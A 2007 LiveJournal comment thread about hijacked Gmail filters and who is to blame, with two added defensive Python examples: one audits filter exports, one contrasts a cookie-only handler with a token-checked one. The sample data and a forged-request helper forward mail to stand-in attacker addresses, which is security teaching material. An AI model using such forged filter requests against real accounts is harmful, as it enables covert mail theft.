(no subject)

Date: 2007-12-27 05:43 pm (UTC)
From: [identity profile] torrain.livejournal.com
*tips hat*

(no subject)

Date: 2007-12-27 06:09 pm (UTC)
From: [identity profile] anivair.livejournal.com
For the record, this is no longer an issue, though still good to check in case you were hacked and never noticed. I certainly checked.

(no subject)

Date: 2007-12-27 06:24 pm (UTC)
From: [identity profile] sivi-volk.livejournal.com
What tells you you were hacked?

(no subject)

Date: 2007-12-27 06:34 pm (UTC)
From: [identity profile] hakerh.livejournal.com
From my understanding of the article, check your forwarding and filter settings and make sure you recognize the address(es) listed. If you see a filter or forward command you didn't put there, you've got a problem. Or so I read it.

(no subject)

Date: 2007-12-27 06:35 pm (UTC)
From: [identity profile] torrain.livejournal.com
There are filters you didn't create in your filter list, doing things like forwarding e-mails to another address and deleting the GMail copy before it ever gets to your Inbox.

(no subject)

Date: 2007-12-27 09:09 pm (UTC)
From: [identity profile] anivair.livejournal.com
Check your settings. It would be under "Filters". Some rule forwarding specific types of email to another address.
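The check the last three comments describe, turned into something you can run: look through an exported Gmail filter list for any rule that forwards mail to an address you do not recognise, or that forwards and then trashes or archives the local copy. This is an added example, not code from the thread or from Google; the Atom feed below is constructed to look like Gmail's filter export (one `<entry>` per rule, with `apps:property` elements such as `forwardTo` and `shouldTrash`), and every address in it is invented.

```python
"""Audit a Gmail-style filter export for rules that forward or hide mail.
Added example; the feed below is constructed, not a real export."""
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Constructed sample export.  The second rule is the pattern described in
# the thread: forward anything matching a keyword elsewhere and trash the
# copy so it never reaches the Inbox.  All addresses are invented.
SAMPLE_FEED = """<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom'
      xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry>
    <title>Mail Filter</title>
    <apps:property name='from' value='newsletter@example.com'/>
    <apps:property name='label' value='Newsletters'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
  <entry>
    <title>Mail Filter</title>
    <apps:property name='hasTheWord' value='transfer OR password OR domain'/>
    <apps:property name='forwardTo' value='dropbox@attacker.example'/>
    <apps:property name='shouldTrash' value='true'/>
  </entry>
  <entry>
    <title>Mail Filter</title>
    <apps:property name='to' value='me+work@example.com'/>
    <apps:property name='forwardTo' value='me@work.example'/>
  </entry>
</feed>
"""


def parse_filters(xml_text):
    """Return each filter entry as a dict of apps:property name -> value."""
    root = ET.fromstring(xml_text)
    filters = []
    for entry in root.findall(ATOM + "entry"):
        props = {p.get("name"): p.get("value")
                 for p in entry.findall(APPS + "property")}
        filters.append(props)
    return filters


def audit_filters(xml_text, known_forwards=()):
    """Flag filters that forward to an address outside known_forwards, and
    filters that forward while discarding the local copy (trash/archive).
    Returns a list of (reason, filter_dict); empty means nothing suspicious."""
    known = {a.lower() for a in known_forwards}
    findings = []
    for f in parse_filters(xml_text):
        fwd = f.get("forwardTo")
        if not fwd:
            continue  # rules that only label/archive are not the concern here
        if fwd.lower() not in known:
            findings.append(("forwards to unrecognised address " + fwd, f))
        if f.get("shouldTrash") == "true" or f.get("shouldArchive") == "true":
            findings.append(("forwards to " + fwd + " and hides the local copy", f))
    return findings


if __name__ == "__main__":
    for reason, f in audit_filters(SAMPLE_FEED, known_forwards=["me@work.example"]):
        criteria = {k: v for k, v in f.items()
                    if k != "forwardTo" and not k.startswith("should")}
        print("SUSPICIOUS:", reason, "| matches:", criteria)
```

Run it against your own export with `known_forwards` set to the addresses you deliberately forward to; anything it prints is a rule you should be able to explain. The second check is independent of the allowlist on purpose: a forward to an address you do recognise that also trashes the copy is still worth a look, because hiding the copy is what lets a rogue rule go unnoticed.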

(no subject)

Date: 2007-12-27 06:38 pm (UTC)
From: [identity profile] theweaselking.livejournal.com
Hence why I used the past tense - there *was* a security hole.

(no subject)

Date: 2007-12-27 06:49 pm (UTC)
From: [identity profile] giza.livejournal.com

Thanks for posting that. The stealing of a domain name aspect is a tad scary.

(no subject)

Date: 2007-12-27 08:02 pm (UTC)
From: [identity profile] sanityimpaired.livejournal.com
What chokes me about this is that everybody is pointing the finger at Google, when the security gap is the result of unsafe email practices on the part of the individual. Not that I'm particularly fond of Google, but I'd rather people know what they're supposed to do to stop this entire type of hack from working rather than blame Google and keep leaving themselves open to being hacked in a similar but not-blocked-by-Gmail way.

In order for hacks like this to work, one of the following needs to happen:
1) You need to be logged into Gmail while surfing the web.
2) You check the "Remember Me on this Computer" box when logging in.

Both are security risks that you should not be taking if email security is important to you. If physical security isn't a problem, then use POP if you want convenience. Otherwise, log in explicitly, check your email, and then hit the sign out link at the top right hand side before you do anything else.

Hotmail went on a crusade to get people to explicitly logout back in the late nineties to stop exactly this kind of thing from happening. It's not a new idea, but people keep going for convenience at the risk of security because they don't think about the consequences until after they get bitten.

(no subject)

Date: 2007-12-27 08:41 pm (UTC)
From: [identity profile] theweaselking.livejournal.com
Sorry, I've forgotten again why it is that I might want my email open all day long.[1] It might be because I like not having to manually log in every time I want to see if I've gotten new email, it might be because of this handy little "google chat" feature they added, and it might *just* be because it's unreasonable to expect that keeping one program open while working in another should be a security risk.

We're not talking about walking away while logged in, here, or saving your passwords in plain text[2]. We're talking about using a system in the manner for which it was designed and intended to be used, and getting burned by it through sloppy coding.

If physical security isn't a problem, then use POP if you want convenience.

Except that POP is not convenient, and IMAP is just like keeping Gmail open, but slower, requires a duplicate address book, and requires another program to run on your machine.

GMail is built to be a fully functional mail client. That means being left open to receive and respond to new mail. This means that security failures due to usage of this product in its intended, designed fashion are exactly analogous to Microsoft's endless security failures in Outlook and Outlook Express.


[1]: Although I never set "remember me". That's not the point.
[2]: Which can also be done securely enough to not matter to people who aren't in front of your computer, but that's not the point EITHER.

(no subject)

Date: 2007-12-27 09:47 pm (UTC)
From: [identity profile] sanityimpaired.livejournal.com
From Gmail's help section:
"When you check the box and log in, Gmail sets a cookie (lasting two weeks) to remember you when you return to the site from the same computer. To disable the cookie, just click Sign out at the top of any Gmail page. You'll need to re-enter your username and password when you return to Gmail.

We encourage you to log out of your account at the end of each session to protect the security of your email information. Logging out of Gmail is especially important if you check your email on a public computer. To end your Gmail session, just click Sign out at the top of any Gmail page."

You'll find a similar section in the help pages of every web-based email app in existence, because this is an inherent vulnerability of web-based email. It's not just GMail, though GMail is popular enough that they're the easiest target.

You've given good reasons why people choose convenience over security, and as you've pointed out the system was designed to give you that choice. That doesn't make the company responsible when somebody chooses convenience when they should have chosen security (as is exactly the case for this gentleman's business).

As for the convenience of POP, it's a good compromise between convenience and security; it's more secure than leaving the cookie there, and more convenient than logging in manually every time I want to check my email. Toss in that it allows me to keep a local copy of my email while having GMail as an offsite backup, and I'm sold.

(no subject)

Date: 2007-12-27 10:01 pm (UTC)
From: [identity profile] theweaselking.livejournal.com
You'll find a similar section in the help pages of every web-based email app in existence

Uh, yeah, because closing your browser without logging out means that the next person can log in.

However, as it quite clearly says, you should do this at the end of your *session*.

And your *session* is going to be minutes or hours or even potentially days long, as is expected with the way normal people use email AND as is expected in the design of email applications.

Applications like, say, Gmail. Which is explicitly and deliberately designed to be something that you keep open as long as you're using the computer, so that you can get your up-to-the-minute emails and chats.

And it should in no way be a security risk, any more than keeping your pop client open should be a security risk, and it should be considered Google's fault when there's a security hole in their system, just as it's Microsoft's fault when Outlook Express has one.

(no subject)

Date: 2007-12-27 11:08 pm (UTC)
From: [identity profile] sanityimpaired.livejournal.com
That is, unfortunately, out of Google's hands. It's an inherent risk in any web-based client/server application, and it applies to every other webmail app out there. The web wasn't designed for client/server stuff, and we have to find hacky ways around it that are relatively insecure. The only way to change that is to remove the web-based component entirely. Meaning that GMail would turn off webmail entirely and force you to use POP.

Which is why I mentioned POP in the first place, it isn't web-based. A POP application doesn't keep a session open that an outside app can hijack. It only connects to GMail when it goes to get your email, and closes the session the second it does so. You don't need an open session to read your email, and the session is a lot more secure because it's not web-based.

To get back on topic, if you want to keep GMail open for hours at a time, that's your call. You have the option to do so. However, you open yourself up to the possibility of being hacked in a similar fashion because the same cookie the "remember me" function uses is there when you're logged in. There is no difference whatsoever from a security perspective. If you aren't worried about the risk, then go to it. If you are, then don't.

In this case, the gentleman is running a business. Taking that risk with his business was foolish of him, and he has been hurt badly because of it. As an aside, I’ve contacted him directly to tell him how he can protect himself in future, so this isn’t just me blowing steam.

Really, there are two ways people can choose to see this:
1) Rely on Google to handle their security for them, and blame Google when it fails.
2) Examine their own actions and protect themselves, and use Google's security features as a secondary form of defense.

I obviously prefer the latter. If I choose to use GMail in a dangerous fashion, and I get bitten by it, I take responsibility for that, because that allows me to change what I'm doing so that it doesn't happen again rather than continue to be at risk. Isn't that really the whole point?
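The mechanism the whole thread is arguing about is a request that rides on the session cookie the browser attaches on its own whenever the mailbox is open: a page on another site submits a form to the settings endpoint, and the server, seeing a valid cookie, installs the filter. The server-side check for that is a per-session anti-forgery token that only a same-origin page can read, optionally backed by an Origin check. The example below is added here and is not Gmail's code or anything from the thread; the `MailSettings` class, the `Request` stand-in, the endpoint behaviour and the `https://mail.example` origin are all assumptions for illustration.

```python
"""Why an ambient session cookie alone must not authorise a settings change.
Added example with toy stand-ins for the request and the mail service;
not Gmail's code, and every name here is invented."""
import hmac
import secrets

SITE_ORIGIN = "https://mail.example"   # assumed origin of the webmail app


class Request:
    """Constructed stand-in for an HTTP POST: cookies the browser attaches on
    its own, the form body the submitting page chose, and the Origin header."""
    def __init__(self, cookies, form, origin=None):
        self.cookies, self.form, self.origin = cookies, form, origin


class MailSettings:
    """Minimal settings backend: sessions keyed by cookie value, filters per user."""
    def __init__(self):
        self.sessions = {}   # session id -> {"user": ..., "csrf": ...}
        self.filters = {}    # user -> [filter dicts]

    def login(self, user):
        """Issue a session cookie and a per-session anti-forgery token.  The
        token is rendered into the settings form; only same-origin pages can
        read it, so a cross-site page cannot supply it."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(16)}
        return sid

    def csrf_token(self, sid):
        return self.sessions[sid]["csrf"]

    def _store(self, sess, form):
        self.filters.setdefault(sess["user"], []).append(
            {"match": form["match"], "forwardTo": form["forwardTo"]})

    def add_filter_vulnerable(self, req):
        """Trusts the cookie alone.  A form on any other site can POST here,
        the browser attaches the victim's cookie, and the attacker's filter is
        installed while the victim merely has the mailbox open in another tab."""
        sess = self.sessions.get(req.cookies.get("SID"))
        if sess is None:
            return 401
        self._store(sess, req.form)
        return 200

    def add_filter_hardened(self, req):
        """Same action, but the form must carry the session's token (compared
        in constant time) and, if an Origin header is present, it must be ours."""
        sess = self.sessions.get(req.cookies.get("SID"))
        if sess is None:
            return 401
        if not hmac.compare_digest(req.form.get("csrf", ""), sess["csrf"]):
            return 403
        if req.origin is not None and req.origin != SITE_ORIGIN:
            return 403
        self._store(sess, req.form)
        return 200


def forged_request(sid):
    """What arrives when the logged-in victim loads an attacker's page: the
    attacker picks the form fields, the browser adds the cookie, and the
    attacker's page has no way to read the token out of our settings page."""
    return Request(cookies={"SID": sid},
                   form={"match": "domain OR transfer",
                         "forwardTo": "drop@attacker.example"},
                   origin="https://attacker.example")


def legitimate_request(svc, sid):
    """The user's own settings form: same fields plus the embedded token."""
    return Request(cookies={"SID": sid},
                   form={"match": "from:work", "forwardTo": "me@work.example",
                         "csrf": svc.csrf_token(sid)},
                   origin=SITE_ORIGIN)


def run_scenario():
    """Drive both handlers with a forged and a legitimate request; return the
    status codes and the filters that ended up installed for the victim."""
    svc = MailSettings()
    sid = svc.login("victim")
    return {
        "forged_vulnerable": svc.add_filter_vulnerable(forged_request(sid)),
        "forged_hardened": svc.add_filter_hardened(forged_request(sid)),
        "legit_hardened": svc.add_filter_hardened(legitimate_request(svc, sid)),
        "installed": svc.filters.get("victim", []),
    }


if __name__ == "__main__":
    for name, value in run_scenario().items():
        print(name, "->", value)
```

The point of the scenario is that the victim does nothing unusual in either case: the cookie is present because the mailbox is open, exactly as the thread describes. The vulnerable handler installs the attacker's forward; the hardened one rejects the same request because the token is missing, and still accepts the user's own form. Signing out does close the window of exposure, but the token check is what removes it.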
